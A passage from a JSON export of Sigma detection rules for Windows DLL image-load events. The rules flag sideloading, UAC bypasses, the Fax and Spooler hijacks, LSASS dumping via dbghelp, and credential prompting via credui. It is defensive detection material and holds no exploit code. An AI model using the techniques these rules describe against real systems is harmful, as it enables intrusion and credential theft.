"meta": { "author": "frack113", 
"creation_date": "2022-12-31", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_coregen.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_coregen.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.t1055" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "value": "Potential DLL Sideloading Using Coregen.exe" }, { "description": "Detects potential DLL sideloading of \"SolidPDFCreator.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-05-07", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_solidpdfcreator.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_solidpdfcreator.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2edbce1-95c8-4291-8676-0d45146862b3", "value": "Potential SolidPDFCreator.DLL Sideloading" }, { "description": "Detects the 
image load of VSS DLL by uncommon executables", "meta": { "author": "frack113", "creation_date": "2023-02-17", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_vsstrace_susp_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/ORCx41/DeleteShadowCopies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48bfd177-7cf2-412b-ad77-baf923489e82", "value": "Suspicious Volume Shadow Copy Vsstrace.dll Load" }, { "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-01", "falsepositive": [ "FP could occur if the legitimate version of vmGuestLib already exists on the system" ], "filename": "image_load_side_load_vmguestlib.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", "value": "VMGuestLib DLL Sideload" }, { "description": "Detects signs of 
the WMI script host process \"scrcons.exe\" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumer activity.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-09-02", "falsepositive": [ "Legitimate event consumers", "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "filename": "image_load_scrcons_wmi_scripteventconsumer.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html", "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", "value": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load" }, { "description": "Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.", "meta": { "author": "Anish Bogati", "creation_date": "2024-01-09", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_cpl_from_non_system_location.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/", 
"https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b140a5c-dc02-4bb8-b6b1-8bdb45714cde", "value": "System Control Panel Item Loaded From Uncommon Location" }, { "description": "Detects any assembly DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_dotnet_assembly_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "value": "DotNET Assembly DLL Loaded Via Office Application" }, { "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", "meta": { "author": "NVISO", "creation_date": "2020-05-04", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_ualapi.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://windows-internals.com/faxing-your-way-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ualapi.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "value": "Fax Service DLL Search Order Hijack" }, { "description": "Detects the \"iscsicpl.exe\" UAC bypass technique, which leverages DLL search order hijacking to load a custom DLL from a temp directory or any other user-controlled location in the user's %PATH%", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "image_load_uac_bypass_iscsicpl.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/wdormann/status/1547583317410607110", "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"9ed5959a-c43c-4c59-84e3-d28628429456", "value": "UAC Bypass Using Iscsicpl - ImageLoad" }, { "description": "Detects loading of essential DLLs used by PowerShell by non-PowerShell process.\nDetects behavior similar to meterpreter's \"load powershell\" extension.\n", "meta": { "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-11-14", "falsepositive": [ "Used by some .NET binaries, minimal on user workstation.", "Used by Microsoft SQL Server Management Studio" ], "filename": "image_load_dll_system_management_automation_susp_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/p3nt4/PowerShdll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml" ], "tags": [ "attack.t1059.001", "attack.execution" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "value": "PowerShell Core DLL Loaded By Non PowerShell Process" }, { "description": "Detect DLL Load from Spooler Service backup folder", "meta": { "author": "FPT.EagleEye, Thomas Patzke (improvements)", "creation_date": "2021-06-29", "falsepositive": [ "Loading of legitimate driver" ], "filename": "image_load_spoolsv_dll_load.yml", "level": "informational", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/ly4k/SpoolFool", "https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574", 
"cve.2021-1675", "cve.2021-34527" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", "value": "Windows Spooler Service Suspicious Binary Load" }, { "description": "Detects potential DLL sideloading of \"goopdate.dll\", a DLL used by googleupdate.exe", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.", "Other third party chromium browsers located in AppData" ], "filename": "image_load_side_load_goopdate.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_goopdate.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6188d2f-b3c4-4d2c-a17d-9706e0851af0", "value": "Potential Goopdate.DLL Sideloading" }, { "description": "Detects windows utilities loading an unsigned or untrusted DLL.\nAdversaries often abuse those programs to proxy execution of malicious code.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-02-28", "falsepositive": [ "Unknown" ], "filename": 
"image_load_susp_unsigned_dll.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql", "https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion", "https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_unsigned_dll.yml" ], "tags": [ "attack.t1218.011", "attack.t1218.010", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5de0c9a-6f19-43e0-af4e-55ad01f550af", "value": "Unsigned DLL Loaded by Windows Utility" }, { "description": "Attempts to load dismcore.dll after dropping it", "meta": { "author": "oscd.community, Dmitry Uchakin", "creation_date": "2020-10-06", "falsepositive": [ "Actions of a legitimate telnet client" ], "filename": "image_load_uac_bypass_via_dism.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "value": "UAC Bypass With Fake DLL" }, { "description": "Detects potential DLL sideloading of \"chrome_frame_helper.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_chrome_frame_helper.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_chrome_frame_helper.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", "value": "Potential Chrome Frame Helper DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"roboform.dll\", a DLL used by RoboForm Password Manager", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-14", "falsepositive": [ "If installed on a per-user level, the path would be located in \"AppData\\Local\". 
Add additional filters to reflect this mode of installation" ], "filename": "image_load_side_load_robform.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/StopMalvertisin/status/1648604148848549888", "https://www.roboform.com/", "https://twitter.com/t3ft3lb/status/1656194831830401024", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_robform.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f64c9b2d-b0ad-481d-9d03-7fc75020892a", "value": "Potential RoboForm.DLL Sideloading" }, { "description": "Detects loading of \"RjvPlatform.dll\" by the \"SystemResetPlatform.exe\" binary which can be abused as a method of DLL side loading since the \"$SysReset\" directory isn't created by default.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_rjvplatform_default_location.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1666716511988330499", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "259dda31-b7a3-444f-b7d8-17f96e8a7d0d", "value": "Potential RjvPlatform.DLL Sideloading From Default Location" }, { "description": "Detects loading of \"credui.dll\" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of \"CredUIPromptForCredentials\" or \"CredUnPackAuthenticationBufferW\".", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-20", "falsepositive": [ "Other legitimate processes loading those DLLs in your environment." ], "filename": "image_load_dll_credui_uncommon_process_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/S12cybersecurity/RDPCredentialStealer", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html", "https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_credui_uncommon_process_load.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1056.002" ] }, "related": [ { "dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "value": "CredUI.DLL Loaded By Uncommon Process" }, { "description": "Detects unsigned module load by ClickOnce application.", "meta": { "author": "@SerkinValery", "creation_date": "2023-06-08", "falsepositive": [ "Unlikely" ], "filename": 
"image_load_susp_clickonce_unsigned_module_loaded.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml" ], "tags": [ "attack.persistence", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "060d5ad4-3153-47bb-8382-43e5e29eda92", "value": "Unsigned Module Loaded by ClickOnce Application" }, { "description": "Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros.", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Legitimate macro usage. Add the appropriate filter according to your environment" ], "filename": "image_load_office_vbadll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_vbadll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", "value": "VBA DLL Loaded Via Office Application" }, { "description": "Detects the load of the dbghelp/dbgcore DLLs (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, the SILENTTRINITY C2 Framework 
has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", "meta": { "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "creation_date": "2019-10-27", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "value": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded" }, { "description": "Detects DLL sideloading of unsigned \"mfdetours.dll\". 
Executing \"mftrace.exe\" can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-11", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_mfdetours_unsigned.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "948a0953-f287-4806-bbcb-3b2e396df89f", "value": "Unsigned Mfdetours.DLL Sideloading" }, { "description": "Detects processes loading modules related to PCRE.NET package", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_pcre_dotnet_dll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/rbmaslen/status/1321859647091970051", "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_pcre_dotnet_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"84b0a8f3-680b-4096-a45b-e9a89221727c", "value": "PCRE.NET Package Image Load" }, { "description": "Detects loading and execution of an unsigned thor scanner binary.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-29", "falsepositive": [ "Other legitimate binaries named \"thor.exe\" that aren't published by Nextron Systems" ], "filename": "image_load_thor_unsigned_execution.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_thor_unsigned_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea5c131b-380d-49f9-aeb3-920694da4d4b", "value": "Suspicious Unsigned Thor Scanner Execution" }, { "description": "Detects potential DLL sideloading of \"libvlc.dll\", a DLL that is legitimately used by \"VLC.exe\"", "meta": { "author": "X__Junior", "creation_date": "2023-04-17", "falsepositive": [ "False positives are expected if VLC is installed in non-default locations" ], "filename": "image_load_side_load_libvlc.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html", "https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf9808c4-d24f-44a2-8398-b65227d406b6", "value": "Potential Libvlc.DLL Sideloading" }, { "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90ae0469-0cee-4509-b67f-e5efcef040f7", "value": "Aruba Network Service Potential DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"ShellDispatch.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-20", "falsepositive": [ "Some installers may trigger some false positives" ], "filename": "image_load_side_load_shelldispatch.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shelldispatch.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "844f8eb2-610b-42c8-89a4-47596e089663", "value": "Potential ShellDispatch.DLL Sideloading" }, { "description": "Detects CLR DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_dotnet_clr_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", "value": "CLR DLL Loaded Via Office Applications" }, { "description": "Detects loading of \"Amsi.dll\" by a living-off-the-land process. 
